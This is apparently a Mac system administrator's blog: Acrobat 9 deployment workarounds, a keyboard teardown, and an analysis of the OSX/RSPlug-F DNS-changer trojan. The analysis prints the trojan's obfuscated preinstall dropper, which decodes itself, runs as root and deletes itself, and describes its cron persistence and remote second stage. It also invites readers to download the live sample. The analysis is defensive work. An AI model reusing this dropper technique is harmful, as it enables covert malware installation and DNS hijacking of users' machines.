Make Acrobat Pro 9 for Mac shut the hell up!

brunerd 6 Comments

So, if you deploy Acrobat Pro to a corporate environment you already know what an aggravating experience it is to try and deploy updates to Adobe products. Silent install? Sure. Silent Update? No. Standard Mac .pkg? No.

So you figure out all the files with loggen, Tracker, fseventer, or whatever your tool, then build your own package with Iceberg. Great. Then you find your “standard” users without admin privileges are getting bothered by Adobe’s SelfHeal BS.

Few things going on here that I’ll try and explain, the code formatting should be copy paste-able check it in a text editor, but all line breaks should be preserved.

Make sure you copy in the new Acrobat Internet-Plugin if the user is using that:
if [ -d "/Library/Internet Plug-Ins/AdobePDFViewer.plugin" ]; then
rm -rf "/Library/Internet Plug-Ins/AdobePDFViewer.plugin";
cp -R "/Applications/Adobe Acrobat 9 Pro/Adobe Acrobat Pro.app/Contents/MacOS/SelfHealFiles/Library/Internet Plug-Ins/AdobePDFViewer.plugin" "/Library/Internet Plug-Ins/";
fi

These next keys really make it complain if it can’t find them, and yes even if you don’t use the plugin it looks for WebBrowserUsePath, so make sure it’s there, and NoViewerSelfHealNeeded gets a new date put after it for every release! Wow neato, a fun easter egg hunt, thanks Adobe!
defaults write /Library/Preferences/com.adobe.acrobat.90.sh "NoViewerSelfHealNeeded Dec 21 2009" -bool TRUE
defaults write /Library/Preferences/com.adobe.acrobat.pdfviewer WebBrowserUsePath -string "file://localhost/Applications/Adobe%20Acrobat%209%20Pro/Adobe%20Acrobat%20Pro.app/"
defaults write /Library/Preferences/com.adobe.acrobat.pdfviewer AdobePDFDriver -string "file://localhost/Applications/Adobe%20Acrobat%209%20Pro/Adobe%20Acrobat%20Pro.app/"

Now is the truly ridiculous part: if those files and keys aren’t found Acrobat ask for an administrator password and then proceed to write them in current users ~/Library/Preferences! What your users don’t know is they can click Cancel a couple times and it will still write them out, but your they’ve already called you to remote in and authenticate them – you lose! Why Adobe?! WHY!?! Asking for an admin password when you’ll just write it to ~/Library/Preferences?

PDF Printer – Here’s the files you need:
/Library/Printers/PPDs/Contents/Resources/en.lproj/ADPDF9.PPD
/Library/Printers/PPD Plugins/AdobePDFPDE900.plugin
/usr/libexec/cups/backend/pdf900
They are all found in:/Applications/Adobe Acrobat 9 Pro/Adobe Acrobat Pro.app/Contents/MacOS/SelfHealFiles/AdobePDFPrinter/

After you’ve copied them to their places, you can run Adobe install script:
/Applications/Adobe\ Acrobat\ 9\ Pro/Adobe\ Acrobat\ Pro.app/Contents/MacOS/SelfHealFiles/AdobePDFPrinter/cupshup.pl

I also figured this out in lpadmin too:
lpadmin -p AdobePDF9 -E -P /Library/Printers/PPDs/Contents/Resources/en.lproj/ADPDF9.PPD -v pdf900://distiller/ -D "Adobe PDF 9.0"

Even if you’ve copied in the PPD, the PDE plugin, the cups backend, and setup the printer, it’ll still think its damaged because you don’t have the PPD in Korean, Japanese, and two type of Chinese! So, must use PlistBuddy to correct this (because defaults is tricky to use when a dictionary is nested in an array – WHY Adobe?!)

Quiet the printer “repair”:
/usr/libexec/PlistBuddy -c "set :0:IsInstalledKey NO" /Library/Application\ Support/Adobe/Acrobat/SHExpectedMissingFileTypes.plist
For Tiger users the path is: /Library/Receipts/iTunesX.pkg/Contents/Resources/PlistBuddy

It’s almost shut the hell up, but the Adobe Updater might decide to pop-up and urge your user to call you up to run updates, so shut it up you got to jump through some hoops, its an “XML” file Adobe style so defaults won’t work on it, nor will plistbuddy, that and it’s a per user setting, so they must run it once to make the file, then you can change it:
cat ~/Library/Application\ Support/Adobe/Updater6/AdobeUpdaterPrefs.dat | sed 's/1\<\/AutoCheck\>/0\<\/AutoCheck\>/' > ~/Library/Application\ Support/Adobe/Updater6/AdobeUpdaterPrefs.new; mv ~/Library/Application\ Support/Adobe/Updater6/AdobeUpdaterPrefs.new ~/Library/Application\ Support/Adobe/Updater6/AdobeUpdaterPrefs.dat

Yes, Adobe has a document for this but it seems only to remove the ability to check for updates within the app?!

Trivia: You might want to copy in the new AcroEFGPro90SelfHeal.xml file, although running “repair” from Acrobat will copy in the new file and for some odd Adobe reason, the self heal inside the app uses Mac line endings but when magically moved to /Library/Application Support/, it has Unix line endings changing the size by 2282 bytes (and also the place of a key as well?). This was a read herring in my research.
cp -f /Applications/Adobe\ Acrobat\ 9\ Pro/Adobe\ Acrobat\ Pro.app/Contents/MacOS/AcroEFGPro90SelfHeal.xml /Library/Application\ Support/Adobe/Acrobat/AcroEFGPro90SelfHeal.xml

Adobe: CS5 had better not use InstallerVISE, iNosso, bindiff, Java, XML, or whatever convoluted processes you are clinging to, just use the dang pkg format that Apple has provided – sheesh. Is this overwrought complex system supporting “make-work” jobs for programmers?

iTunes 9.0.3 Zoom and mini Player

brunerd 2 Comments

Why is iTunes messing with my shortcuts again?

So here’s the deal: since iTunes version who-the-hell-knows it’d go to the mini player when you press Command-Option-Z, then iTunes 9 changed it all and made it fill the screen. iTunes 9.0.1 restored the Zoom functionality, then 9.0.3 took it away. So…

Now for mini Player you have to do a Command-Shift-M
I can’t do that with my left hand alone! That’s how I used to work!
Right hand on the mouse, left hand by the keyboard.
Now it’s two handed operation. Boo.

Update:
It might be possible with a modified “I love you” hand sign to accomplish this, which is ironic since I don’t like this key combo at all!

Snow Leopard AD Binding misnomer

brunerd 1 Comment

The misnomer being “Server Address”, it should really be “Domain Name”.
When you point to a specific domain controller, it will fail.

This is because it looks for SRV records in DNS that are only available at the domain level.
So trying dc01.meco.com it will look for _ldap._tcp.dc01.pretendco.com and not find it.

However a lookup of _ldap._tcp.pretendco.com if set up properly will work.
dig -t SRV _ldap._tcp.pretendco.com

The misleading label of “Server Address” is the culprit.
It should read Domain Name.

Hope that helps some people…
(Now I just need to get the AD admin at my work to get the _gc._tcp SRV record published!)

10.6_binding

Apple Keyboard A1243 Disassembly

brunerd 6 Comments

So – you (or one of your users) spills coffee on an Apple keyboard — what to do?
Well with previous models, they could disassembled with some some effort, and be washed. (G5 KB, G4 KB, & more)
Well I don’t think this is gonna be happening for the new keyboards…
First, no screws, only adhesive and welds.

Putty Knife in Keyboard

You can work it open with a putty knife. Avoid the red areas at the top, that is the extent of the arms of the ribbon cable inside, a putty knife will wreck them quite quickly.

Once you worked the putty knife all around the safe areas, attempt to pull the white plastic bottom (with a metal backer glued to it) open like a book, pivoting on the area you couldn’t work around.

Keyboard Sticky Back

That’s about it… You can unscrew the USB interface from the white plastic well, but the cord is captive, because the wires are soldered to the board. You can desolder the wires from the board or snip the white plastic if you want take the board out.

The keyboard itself is attached to the aluminum top with 147 welds, rather than the ~30 screws it used to have.

Keyboard back and Aluminum Top

I was able to pull it off using some vice grips on a corner I pried up.
There’s no going back after this, both frames will bend and warp as the welds pop off.

So you’ll be left with a bunch of keys still attached to the keyboard on little white plastic clips in various ways.

These keys are all attached the same and are easy to take off: Top row keys, arrow keys, Option, Command, Shift, return, tab, caps lock, Space.
They will have a plastic mechanical that has small plastic tabs in the metal frame, just push the tiny nub out of the fram and key is free.
The letter keys however I found difficult, the key top can be taken off easily by pulling up sideways but the plastic underneath is hooked on top and bottom by the metal frame. It needs to be pushed from the bottom toward the top and a black stick put under the top corner so it pops off the frame’s hook, the same can be done, for the other side, or if you twist it right, it will unhook from the bottom and come off.

After you have taken all the bottom plastic key mechanicals off, you can easily take off the two plastic layers.

Keyboard Bottom Layers

The top layer is a simple plastic sheet with the rubber nipples that press down and give the keys spring.

Keyboard Top Plastic

The next layer is new, what was once three sheets (two sheets of circuit traces and a buffer in between) is now one laminated whole . While you’d hope this makes the keyboard more impervious to spills and perhaps it does, it precludes the ability to wash and dry like the old keyboards. (You had to act quick though, coffee and coke eat though the traces really fast!) Putty knives are also really bad for circuit traces (see the mangled ribbon cable)

Keyboard Trace Layer Keyboard Trace Sammich

Well that’s about all I learned, next time perhaps I will try simply soaking the keyboard in water then drying for a week or two, but a chance at some first hand dissection was too tempting. :)

Keyboard Finale

bash architecture mismatch in Tiger intel builds

brunerd

Tiger, I know, ancient history…
Well, I’ve stumbled on an old oddity with bash on intel builds of Tiger:
Bash thinks its running on a PPC machine!?
At least the environment variables think so…
$ arch
i386
$ echo $HOSTTYPE
powerpc
$echo $MACHTYPE
powerpc-apple-darwin8.0

This might only affect those who are using Fink or building your apps, or those who like things to be right.

Append these lines to /etc/profile, using sudo nano /etc/profile
HOSTTYPE=i386
MACHTYPE=i386-apple-darwin8.0
export HOSTTYPE
export MACHTYPE

Now the one thing this won’t do is affect the 5th element of the BASH_VERSINFO array, it seems to be readonly… so if you are very adventurous you can go into /bin/bash with a Hex Editor and overwrite the first two ‘powerpc’ references with i386 (the second set of powerpc refs are correct that is the ppc portion of the fat binary), don’t move the start of of string, just pad the end with zeros (NULL) and it will affect this variable as well.

Alright, now it’s in “The Google”

Create a standard .pkg for Acrobat Reader

brunerd

It’s time to patch Acrobat Reader again! And leave it to Adobe to use a patcher app (or Installer Vise, or a downloader, or a some crazy Javascript/XML/AIR based installer) to make things hard for mass deployment to be achieved (and no I don’t think the Deployment Kit for CS4 makes much sense!).

Perhaps soon they’ll have a full version of Reader available for download in a seemingly standard .pkg file, but don’t be fooled! If you admin Macs like I do you might have noticed it uses the iNosso plugin to uncompress it’s payload and it is totally incompatible with ARD’s Install Package. It just fails.

But fear not, I am a big fan of Iceberg and it’s ability to make the painstaking process of installing Adobe apps so much easier. And I want to share the love. So here take this.

I put a small how-to in the zip file with a sparse set of instructions and caveats. Basically you install Acrobat Reader in the normal way, install Iceberg, open the iceberg project, and build. You’ll then have a pkg that ARD can push out.

If you have questions — Google it! ;)
(OK you can leave a comment, but for gawd’s sake not “How do I use this?” — seriously!)

Office 2008 out of context

brunerd 1 Comment

So… who’s running Office 2008 and hasn’t seen CGBitmapContextGetData: invalid context popping up in their system.log? I’ve seen it plenty: on Tiger, Leopard, ppc, and i386 systems (18MB worth on one heavy Powerpoint users’!) What’s puzzling is why MS hasn’t fixed it (do you want us to go over to iWork or what?!)

Anyway, lots of chatter on the net and no solutions except to hope either Apple or MS fix it… and I hope they do, we are rolling 2008 out at work (finally) and it’s stupefying to see this memory leaking bug is just spewing out garbage into logs at astonishing rate (inserting one movie gave me 22 messages!)

Anyway here’s some samples of what is happening when this error occurs
1 WrapContext
1 GetDeviceCaps
1 CGBitmapContextGetData
1 CGPostError
1 CGPostErrorWithArguments
1 asl_vlog$LDBL128
1 asl_send
1 gethostname
1 __sysctl
1 __sysctl

Seems that after calling GetDeviceCaps, which I can find Windows CE references to on the web, it then calls CGBitmapContextGetData and fails and the logging ensues… so MS if you guys are reading, please fix the info that GetDeviceCaps is either giving or getting so we can get some work done, thanks!

More traces:

3 WrapContext
3 GetDeviceCaps
3 CGBitmapContextGetData
3 CGPostError
3 CGPostErrorWithArguments
2 asl_vlog$LDBL128
2 asl_send
2 notify_get_state
2 _notify_server_get_state
2 mach_msg
2 mach_msg_trap
2 mach_msg_trap

1 0x46af14
1 0x4515b8
1 0x451500
1 0xb12e0
1 MsoFillCGDc
1 WrapContext
1 GetDeviceCaps
1 CGBitmapContextGetData
1 CGPostError
1 CGPostErrorWithArguments
1 asl_vlog$LDBL128
1 asl_free
1 free
1 szone_size
1 szone_size

2 0x605b54
2 0x4515b8
2 0x451500
2 0xb12e0
2 MsoFillCGDc
2 WrapContext
2 GetDeviceCaps
2 CGBitmapContextGetData
2 CGPostError
2 CGPostErrorWithArguments
2 asl_vlog$LDBL128
2 asl_send
1 asl_format_message
1 _asl_append_string
1 __memcpy
1 __memcpy
1 gethostname
1 __sysctl
1 __sysctl

 

2 0x4515b8
2 0x451500
2 0xb12e0
2 MsoFillCGDc
2 WrapContext
2 GetDeviceCaps
2 CGBitmapContextGetData
2 CGPostError
2 CGPostErrorWithArguments
2 asl_vlog$LDBL128
2 asl_send
1 asl_format_message
1 _asl_append_string
1 __memcpy
1 __memcpy
1 gethostname
1 __sysctl
1 __sysctl

Comments working

brunerd

I had been basking in the lack of spam in the comments and thinking it was too good to be true, when I was told by a friend, that no one could comment… and that’s no good! So I fixed that… so now we’ll see how good WP-Spamfree is

Tearing Apart OSX/RSPlug-F

brunerd 2 Comments

OK… I might be a bit late to the party (and Conficker is grabbing all the headlines) but there were some interesting things I found looking at the  headline grabbing trojan OSX/RSPlug-F. Thanks to the effervescent Graham Cluley for his witty post with video demonstration of OSX/RSPlug-F being detected. It’s what started this investigation.

So, being the curious guy I am I decided to download the very same file Graham did in his demo. While, hdtvxvid.org had since fixed their hijacked page, luckily the status bar had a readable URL that with some squinting I was able to decipher it… So I downloaded the sucker, you can too!

Live Code: OSX/RSPlug-F trojan

And what else can I say but: I’ll be darned if I can get the thing to work! Actually I do get it to work, but due to some coding errors out of the box, it’s a dud.

So let’s start the dissection:

The URL downloads HDTVPlayerv3.5.dmg, inside is contained install.pkg, which if you’re using Safari on a Mac and have the damnable default of “Open ‘Safe’ files after Downloading” it’ll go right to the installer. Which let me note Open “Safe” Files after downloading is the stupidest thing to happen to browsers since Active-X. The air quotes around “Safe” do not help, Apple, it’s a sly wink and a nod that no file type is totally safe but *shrug* whatcha gonna do? I’ll tell you what: don’t make it a dang default!

firefox-rsplug-cached-before-clicking-save

Firefox is not off the hook either, let me bring up the poisonous Firefox convenience: “predownloading”. Did everyone notice how the virus alert for Graham pops up before he clicks save? How Firefox initiates downloads immediately to cache and upon the user clicking Save it copies it to the destination or if the click Cancel it stays there. I think Firefox’s behaviour is ridiculous, yes it might make me happy when I download some ginormous game demo and come back hours later having forgotten to click Save and am pleasantly surprised that “hey it’s already here!”, but otherwise let me decide what and when something goes on my hard drive.

Anyway… let’s look at an Installer window the average user won’t look at: Show Files

./AdobeFlash
./Mozillaplug.plugin
./Mozillaplug.plugin/Contents
./Mozillaplug.plugin/Contents/Info.plist
./Mozillaplug.plugin/Contents/MacOS
./Mozillaplug.plugin/Contents/MacOS/VerifiedDownloadPlugin
./Mozillaplug.plugin/Contents/Resources
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc
./Mozillaplug.plugin/Contents/version.plist

First couple of suspect thing is a single flat file called AdobeFlash and then Mozillaplug.plugin, which is really just the mysterious VerifiedDownloadPlugin. No mention of Cinema eh?

Take a gander in Info.plist of install.pkg to see where it goes:
IFPkgFlagDefaultLocation /Library/Internet Plug-Ins/

So then, why would it need root privileges for an admin writable folder, eh?
redflag
IFPkgFlagAuthorizationAction RootAuthorization, for those following along in the Info.plist
Bonus: CFBundleGetInfoStringwho cares
Double Secret Bonus:
Resource/en.lproj/Description.plist IFPkgDescriptionDescription = shutdafuckup

Strangely when you look in both the logs created by Installer.app in /var/log/installer.log:
Leopard it says: "admin auth received to install"
Tiger says: "Administrator authorization granted."
I don’t know why you wouldn’t want the logs to clearly state root privileges were given, but there you have it, it doesn’t.

So what does it do with the root privileges? Hmmm? Let’s look in the preinstall/preupgrade scripts which are identical because apparently the author didn’t realize that a preflight script would kill two birds with one stone.

#!/bin/sh
if [ $# != 1 ]; then type=0; else type=1; fi && tail -37 $0 | sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' | uudecode -o /dev/stdout | sed 's/applemac/AdobeFlash/' | sed 's/bsd/7000/' | sed 's/gnu/'$type'/' >`uname -p` && sh `uname -p` && rm `uname -p` && exit
yksrepsak 777 nigeb
O(2/H178PI@(C%6;EQ&<#-RX"-Y(2/21$1!!52M
.... <SNIP> ....
*4F;DI`8*(B(`A$8*TD(`5T4^<3+4EC-8
`
dne

OK, so it takes the tail of itself , does some sed magic to flip around the reveresed UUEncoded data, spit it out, replace ‘applemac’ with ‘AdobeFlash’ (remember that’s in the bom payload), replace bsd with 7000, gnu with a boolean value that depends on whether there are any arguments when the script is called. Then after all that sed nonsense, names the file the result of uname -p, attempts to execute the file (as root), delete that file, then exit.

Well, we’ll get to the ‘unencrypted’ payload in a sec let’s run this and see what happens leopard-fail anf tiger-fail — they fail. As a consequence, the AdobeFlash is NOT installed, but it is the same code as the preinstall so, still not off the hook here.Let’s see where we’re at:

The root crontab is altered to inlude: * */5 * * * /Library/Internet Plug-Ins/AdobeFlash
Since the script fails, the package does not install, so the crontab pointing to it is useless…

i386 is left in the root, it doesn’t get a chance to delete itself, considering that all those && statements mean “execute the next step only if the last thing completed correctly”, since it fails it doesn’t get deleted.

i386 contains some more backward UUEncoded data with and some more sed replacements, then pipes it all into perl, here’s the perl code it attempts to run, but unfortunately it fails on line 14 and goes no further. But let’s say we fix the code so it can talk to the server, get a response, and parse the output into a file…

685 is downloaded to /tmp where it runs, does some more sed string swaps, secret decoder ring translations for the DNS servers, outputs this — the nasty part that changes your DNS entries, then deletes the temp file. It makes good use of the very handy concept of “here documents” to script scutil to change the DNS servers, which seem to rotate, you’ll get new servers everytime you run it, suffice to say, the Ukranian subnet of 85.255.112.xxx is totally compromised, as well as 94.247.2.109 the Latvian server from which the files are downloaded. But who knows who’s financing and running it in this global day and age. But the propensity for matryoshka style nested code seems telling :)

Running some dig commands to get DNS answers from the servers reveals they are given back valid addresses, currently, but I only tested a few sites, it might only have redirection for select dummy bank sites they have set up, who knows…

The lesson here is: Always use Installer to look at the Files, see what your authorization level is, check out the pre/post scripts and generally do what only 1% of the most vigilant of the population would do and you’ll be fine. Hopefully, root authorization will carry more weight in the Installer.app UI and say “Hey are your sure you want to grant root — REALLY!?”, pre/postflight scripts will be easier to look in UI (I am dreaming aren’t I), the logs won’t lie about the auth level (very do-able), and Firefox will respect my wishes and only truly Save when I click Save… (it’s open source, easy to change, but it’ll take a flame war to settle it)

Until then, I hope you enjoyed this malware tour, stay safe and away from porn sites with 3rd party HD codecs.

Update:
I suppose it’d be helpful to add some instructions on how to reverse the scutil modifications, here’s the script (the code might look familiar)

#!/bin/sh
if (( $(id -u) != 0 )); then echo "Please run with sudo" && exit 1; fi
PSID=$( (/usr/sbin/scutil | /usr/bin/grep PrimaryService | /usr/bin/sed -e 's/.*PrimaryService : //')<< EOF
get State:/Network/Global/IPv4
d.show
quit
EOF
)

/usr/sbin/scutil << EOF
remove State:/Network/Service/$PSID/DNS
quit
EOF

echo "Please toggle your network adapter on/off to refresh DNS servers from DHCP"

Basically it nukes the DNS entries that got hosed, then pulls down the DHCP info, uless you have manually entered DNS settings, in which case, you should know what you’re doing.